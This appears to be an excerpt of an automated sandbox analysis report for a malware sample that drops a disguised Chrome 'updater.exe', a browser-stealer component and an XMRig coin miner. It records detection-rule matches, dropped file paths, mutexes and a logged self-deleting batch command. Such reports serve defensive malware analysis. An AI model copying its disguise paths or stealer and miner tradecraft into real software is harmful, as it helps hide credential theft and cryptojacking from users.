                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD2A76D7_2_00007FF7DFD2A76D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD29F3B7_2_00007FF7DFD29F3B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD367507_2_00007FF7DFD36750
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD417207_2_00007FF7DFD41720
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD44EFC7_2_00007FF7DFD44EFC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD38EF47_2_00007FF7DFD38EF4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD426C47_2_00007FF7DFD426C4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD33ED07_2_00007FF7DFD33ED0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD326847_2_00007FF7DFD32684
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD46DCC7_2_00007FF7DFD46DCC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD335407_2_00007FF7DFD33540
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD475507_2_00007FF7DFD47550
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD384BC7_2_00007FF7DFD384BC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD3ECA07_2_00007FF7DFD3ECA0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD324807_2_00007FF7DFD32480
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD3AC507_2_00007FF7DFD3AC50
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD3F3207_2_00007FF7DFD3F320
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD292D07_2_00007FF7DFD292D0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD342D47_2_00007FF7DFD342D4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD417207_2_00007FF7DFD41720
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD32A947_2_00007FF7DFD32A94
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD44A607_2_00007FF7DFD44A60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD322747_2_00007FF7DFD32274
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8871D0E08_2_000001EB8871D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB887238A88_2_000001EB887238A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB88711F2C8_2_000001EB88711F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB88742B2C8_2_000001EB88742B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8874DCE08_2_000001EB8874DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB887544A88_2_000001EB887544A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8877D0E08_2_000001EB8877D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB887838A88_2_000001EB887838A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB88771F2C8_2_000001EB88771F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC2F1608_2_00007FFDFAC2F160
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC81D208_2_00007FFDFAC81D20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC790608_2_00007FFDFAC79060
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACE42008_2_00007FFDFACE4200
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACF7B508_2_00007FFDFACF7B50
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC86B408_2_00007FFDFAC86B40
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACAEAE08_2_00007FFDFACAEAE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC87B108_2_00007FFDFAC87B10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAD13AF08_2_00007FFDFAD13AF0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC79AB08_2_00007FFDFAC79AB0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACA9BB08_2_00007FFDFACA9BB0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC69BA08_2_00007FFDFAC69BA0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC63BD08_2_00007FFDFAC63BD0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC6FBC08_2_00007FFDFAC6FBC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC6A8A08_2_00007FFDFAC6A8A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC8D8D08_2_00007FFDFAC8D8D0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACC6A108_2_00007FFDFACC6A10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC7C9A08_2_00007FFDFAC7C9A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACE99608_2_00007FFDFACE9960
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC7CF108_2_00007FFDFAC7CF10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACCBE708_2_00007FFDFACCBE70
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACA4FE08_2_00007FFDFACA4FE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC70FB08_2_00007FFDFAC70FB0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACD2D1D8_2_00007FFDFACD2D1D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC6BCF08_2_00007FFDFAC6BCF0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACD6CF08_2_00007FFDFACD6CF0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACBDD108_2_00007FFDFACBDD10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACBAC608_2_00007FFDFACBAC60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACD1C608_2_00007FFDFACD1C60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC8CE308_2_00007FFDFAC8CE30
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC8EDE08_2_00007FFDFAC8EDE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACBFE108_2_00007FFDFACBFE10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACFBDB08_2_00007FFDFACFBDB0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAD22D608_2_00007FFDFAD22D60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC672F18_2_00007FFDFAC672F1
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACBC2F08_2_00007FFDFACBC2F0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAD042A08_2_00007FFDFAD042A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC632A58_2_00007FFDFAC632A5
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACB62808_2_00007FFDFACB6280
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC734208_2_00007FFDFAC73420
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACBB3708_2_00007FFDFACBB370
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC723808_2_00007FFDFAC72380
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACCB1308_2_00007FFDFACCB130
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC7C0E08_2_00007FFDFAC7C0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC640E08_2_00007FFDFAC640E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC910E08_2_00007FFDFAC910E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC8E0B08_2_00007FFDFAC8E0B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACC20708_2_00007FFDFACC2070
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC840808_2_00007FFDFAC84080
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACC42008_2_00007FFDFACC4200
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACEB1A08_2_00007FFDFACEB1A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACEA1708_2_00007FFDFACEA170
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC767208_2_00007FFDFAC76720
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC6283E8_2_00007FFDFAC6283E
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC647E08_2_00007FFDFAC647E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC645308_2_00007FFDFAC64530
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACDC5108_2_00007FFDFACDC510
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC895008_2_00007FFDFAC89500
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC9C4B98_2_00007FFDFAC9C4B9
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFAC694C08_2_00007FFDFAC694C0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFACA45D08_2_00007FFDFACA45D0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB3C2F208_2_00007FFDFB3C2F20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B18908_2_00007FFDFB9B1890
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007A57708_2_00007FFE007A5770
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE0076116D8_2_00007FFE0076116D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE00761B548_2_00007FFE00761B54
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007983F08_2_00007FFE007983F0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007CC5308_2_00007FFE007CC530
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE00761A0F8_2_00007FFE00761A0F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007686308_2_00007FFE00768630
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007616FE8_2_00007FFE007616FE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007D26E08_2_00007FFE007D26E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007617F88_2_00007FFE007617F8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE0076143D8_2_00007FFE0076143D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007613DE8_2_00007FFE007613DE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007626FD8_2_00007FFE007626FD
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007626128_2_00007FFE00762612
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007616188_2_00007FFE00761618
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE0076117C8_2_00007FFE0076117C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE0076149C8_2_00007FFE0076149C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007624D78_2_00007FFE007624D7
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE00826D908_2_00007FFE00826D90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007621C18_2_00007FFE007621C1
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE00761C128_2_00007FFE00761C12
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007770B08_2_00007FFE007770B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007AD2F08_2_00007FFE007AD2F0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE0076155A8_2_00007FFE0076155A
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007A93708_2_00007FFE007A9370
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE00761FD78_2_00007FFE00761FD7
                                  Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Microsoft\hacn.exe A7C3208CF3067D1DA12542CAB16516C9085620959DEB60DD000E190F15C74758
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\main.exe E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\setup.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFE007DC93D appears 50 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FF7DFD22B10 appears 47 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFAC91940 appears 38 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFE007DC181 appears 780 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFE007DC16F appears 211 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFE00761325 appears 309 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFAC69330 appears 136 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFAC6A4B0 appears 161 times
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: String function: 00007FF647772B30 appears 47 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: String function: 00381D60 appears 31 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: String function: 00381590 appears 57 times
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: String function: 00007FF6CEB22B10 appears 47 times
                                  Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: unicodedata.pyd.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: rar.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: unicodedata.pyd.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: _pytransform.dll.22.drStatic PE information: Number of sections : 11 > 10
                                  Source: setup.exe.12.drStatic PE information: Number of sections : 11 > 10
                                  Source: api-ms-win-core-processthreads-l1-1-1.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-errorhandling-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-profile-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-string-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-stdio-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-utility-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-heap-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-handle-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-synch-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-filesystem-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-synch-l1-2-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-sysinfo-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-datetime-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-namedpipe-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-timezone-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-processenvironment-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-memory-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-process-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-runtime-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-console-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-conio-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-interlocked-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-time-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-util-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-math-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-convert-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-locale-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-environment-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-localization-l1-2-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-file-l2-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-string-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-rtlsupport-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-crt-heap-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-debug-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-processthreads-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: python3.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-file-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-libraryloader-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: api-ms-win-core-file-l1-2-0.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exeBinary or memory string: OriginalFilename vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000002.00000002.1861001417.00007FFDFB3C4000.00000004.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs TS-240605-Millenium1.exe
                                  Source: TS-240605-Millenium1.exe, 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs TS-240605-Millenium1.exe
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991822997667185
                                  Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.999059198943662
                                  Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.994088121639785
                                  Source: libcrypto-3.dll.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.999059198943662
                                  Source: libssl-3.dll.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
                                  Source: python311.dll.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991822997667185
                                  Source: sqlite3.dll.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.9976578251008065
                                  Source: unicodedata.pyd.7.drStatic PE information: Section: UPX1 ZLIB complexity 0.994088121639785
                                  Source: main.exe.12.dr, utils.csCryptographic APIs: 'CreateDecryptor'
                                  Source: Update.exe.21.dr, utils.csCryptographic APIs: 'CreateDecryptor'
                                  Source: main.exe.12.dr, BrowserStealer.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: Update.exe.21.dr, utils.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: Update.exe.21.dr, utils.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: main.exe.12.dr, utils.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: main.exe.12.dr, utils.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: Update.exe.21.dr, BrowserStealer.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: .pptx.odt.csv.sql.mdb.sln.php
                                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@132/153@5/4
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB28770 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF6CEB28770
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0037C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,5_2_0037C652
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exe
                                  Source: C:\ProgramData\main.exeFile created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog
                                  Source: C:\ProgramData\Microsoft\based.exeMutant created: \Sessions\1\BaseNamedObjects\H
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8148:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                                  Source: C:\ProgramData\main.exeMutant created: \Sessions\1\BaseNamedObjects\CosturaA54E036D2DCD19384E8EA53862E0DD8F
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642Jump to behavior
                                  Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCommand line argument: sfxname5_2_0038037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCommand line argument: sfxstime5_2_0038037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCommand line argument: pP:5_2_0038037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCommand line argument: STARTDLG5_2_0038037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCommand line argument: >G95_2_00394690
                                  Source: TS-240605-Millenium1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
